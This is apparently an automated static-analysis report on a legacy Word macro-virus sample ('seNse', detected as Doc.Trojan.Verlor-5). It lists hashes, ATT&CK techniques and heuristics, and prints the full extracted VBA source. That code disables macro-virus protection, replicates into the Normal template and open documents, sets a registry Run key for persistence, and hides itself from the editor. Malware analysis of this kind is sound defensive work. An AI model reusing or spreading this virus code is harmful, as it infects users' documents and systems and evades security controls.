Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 226cb118a1677eed…

MALICIOUS

Office (OLE)

33.0 KB Created: 1999-12-15 03:47:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: d22c5af66e6cf3f917638cc6e25d19d0 SHA-1: 8a16c2e07664eb012d666f514b4a0227ab7d7723 SHA-256: 226cb118a1677eed517cbbb1f38aa1035861ed74599fe59b9dbec444cc205b42
296 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains legacy WordBasic markers and VBA macros, including an Auto_Close macro. The Auto_Close macro attempts to export the current macro code to a DLL and import it into the Normal template, likely to evade detection or ensure persistence. It also attempts to establish persistence by writing a VBScript to the registry Run key: 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\seNse' pointing to 'C:\Windows\seNse.a.vbs'.

Heuristics 7

  • ClamAV: Doc.Trojan.Verlor-5 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Verlor-5
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.deletelines 1, NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    windir = Environ("windir")
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5114 bytes
SHA-256: e8ce4c985f51c522e003f1d0d25f26c51ee2fac5871bd04c5bbb7a5c2ee40f6f
Detection
ClamAV: Doc.Trojan.Verlor-5
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoClose()


'MyName = seNse'WrittenBy = f0re [UC/Skamwerks/DVC]
'Version = .A (1.2)On Error Resume Nextwindir = Environ("windir")
If Dir(windir & "\tempad.dll") <> "" Then Kill (windir & "\tempad.dll")
If Dir(windir & "\tempnt.dll") <> "" Then Kill (windir & "\tempnt.dll")
Options.VirusProtection = FalseOptions.ConfirmConversions = False
Options.SaveNormalPrompt = False
If NormalTemplate.VBProject.VBComponents.Item("Module1").CodeModule1.Lines(3, 1) <> "'MyName = seNse" Then
ActiveDocument.VBProject.VBComponents("Module1").Export (windir & "\tempad.dll")
NormalTemplate.VBProject.VBComponents.import (windir & "\tempad.dll")
NormalTemplate.Save

End If
If ActiveDocument.VBProject.VBComponents.Item("Module1").CodeModule1.Lines(3, 1) <> "'MyName = seNse" Then
NormalTemplate.VBProject.VBComponents("Module1").Export (windir & "\tempnt.dll")
ActiveDocument.VBProject.VBComponents.import (windir & "\tempnt.dll")
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End Sub
Sub Stealth()
On Error Resume Next
windir = Environ("windir")
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\software\", "RegisteredOwner") = "f0re"
System.PrivateProfileString("", "HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run", "seNse") = windir & "\seNse.vbs"
If Dir(windir & "\seNse.a.vbs") <> "" Then Kill (windir & "\seNse.a.vbs")
If Dir(windir & "\seNse.a.dll") <> "" Then Kill (windir & "\seNse.a.dll")
Open "c:\windows\seNse.a.vbs" For Append As #1
Print #1, "On error resume next"
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "WordObj.Options.SaveNormalPrompt = False"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.remove WordObj.NormalTemplate.VBProject.VBComponents(" & Chr(34) & "Module1" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.import (" & Chr(34) & windir & "\seNse.a.dll" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "set NT = nothing"
Print #1, "WordObj.Quit"
Close #1
NormalTemplate.VBProject.VBComponents("Module1").Export (windir & "\seNse.a.dll")
End Sub
Sub ViewVBCode()
On Error Resume Next
Call Stealth
For X = 1 To NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
 Code = Code & NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.deletelines 1, NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
NormalTemplate.Saved = TrueDocnumber = Application.Documents.Count
If Docnumber >= 1 Then
For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module1").CodeModule1.deletelines 1, Documents(X).VBProject.VBComponents("Module1").CodeModule1.CountOfLines
Documents(X).Saved = True
Next X
End If
Application.ShowVisualBasicEditor = True
While Application.ShowVisualBasicEditor = TrueDoEventsWend
NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.InsertLines 1, Code
NormalTemplate.SaveDocnumber = Application.Documents.Count
If Docnumber >= 1 Then
For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module1").CodeModule1.InsertLines 1, Code
Documents(X).SaveAs Documents(X).FullName
Next X
End If
End Sub
Sub ToolsMacro()
On Error Resume Next
For X = 1 To NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
 codeNT = codeNT & NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.deletelines 1, NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
NormalTemplate.Saved = TrueDocnumber = Application.Documents.Count
If Docnumber >= 1 Then
 For Y = 1 To ActiveDocument.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
  CodeAD = CodeAD & ActiveDocument.VBProject.VBComponents("Module1").CodeModule1.Lines(Y, 1) & Chr(13)
 Next Y
 For X = 1 To Docnumber
 Documents(X).VBProject.VBComponents("Module1").CodeModule1.deletelines 1, Documents(X).VBProject.VBComponents("Module1").CodeModule1.CountOfLines
 Documents(X).Saved = True
 Next X
 End If
Application.Dialogs(wdDialogToolsMacro).Show
If Application.ShowVisualBasicEditor = False Then
 NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.InsertLines 1, codeNT
 NormalTemplate.Save
 If Docnumber >= 1 Then
 For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module1").CodeModule1.InsertLines 1, CodeAD
Documents(X).SaveAs Documents(X).FullName
Next X
End If
End If
End Sub
'Put this code in a Module1 called "Module1". I created a form of stealth.
'However not full stealth. But it's a nice attempt i think/hope :).
End Sub